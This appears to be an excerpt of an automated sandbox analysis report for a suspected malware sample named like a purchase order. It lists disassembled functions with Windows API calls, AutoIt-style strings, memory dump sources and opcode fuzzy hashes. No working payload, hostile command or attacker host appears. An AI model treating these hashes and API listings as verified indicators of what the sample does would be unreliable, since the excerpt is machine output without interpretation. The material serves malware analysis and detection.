                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                      • String ID:
                      • API String ID: 3413494760-0
                      • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                      • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                      Function 0044EDCC Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 472COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _strncmp
                      • String ID: '$DEFINE$\$`$h$h
                      • API String ID: 909875538-3708680428
                      • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                      • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                      • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                      • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                      Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressProc_free_malloc$_strcat_strlen
                      • String ID: AU3_FreeVar
                      • API String ID: 2634073740-771828931
                      • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                      • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                      Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32 ref: 0046C63A
                      • CoUninitialize.OLE32 ref: 0046C645
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                      • IIDFromString.OLE32(?,?), ref: 0046C705
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 2294789929-1287834457
                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                      Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                      • ReleaseCapture.USER32 ref: 0047116F
                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                      • API String ID: 2483343779-2107944366
                      • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                      • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                      Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                      • _wcslen.LIBCMT ref: 00450720
                      • _wcscat.LIBCMT ref: 00450733
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcscat_wcslen
                      • String ID: -----$SysListView32
                      • API String ID: 4008455318-3975388722
                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                      Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                      • GetParent.USER32 ref: 00469C98
                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                      • GetParent.USER32 ref: 00469CBC
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 2360848162-1403004172
                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                      Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                      • String ID:
                      • API String ID: 262282135-0
                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                      Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow
                      • String ID:
                      • API String ID: 312131281-0
                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                      Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                      • String ID:
                      • API String ID: 3771399671-0
                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                      Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                      Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 0-1603158881
                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                      Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                      Download Yara Rule
                      APIs
                      • CreateMenu.USER32 ref: 00448603
                      • SetMenu.USER32(?,00000000), ref: 00448613
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                      • IsMenu.USER32(?), ref: 004486AB
                      • CreatePopupMenu.USER32 ref: 004486B5
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                      • DrawMenuBar.USER32 ref: 004486F5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                      • String ID: 0
                      • API String ID: 161812096-4108050209
                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                      Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                      • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                      Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                      • String ID:
                      • API String ID: 978794511-0
                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
